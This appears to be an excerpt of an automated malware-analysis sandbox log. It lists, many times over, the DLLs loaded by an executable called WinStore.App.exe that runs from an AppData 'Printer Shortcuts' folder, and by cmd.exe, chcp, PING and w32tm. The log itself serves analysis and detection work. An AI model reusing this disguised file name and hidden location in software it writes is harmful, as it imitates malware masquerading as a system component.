Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: iphlpapi.dll
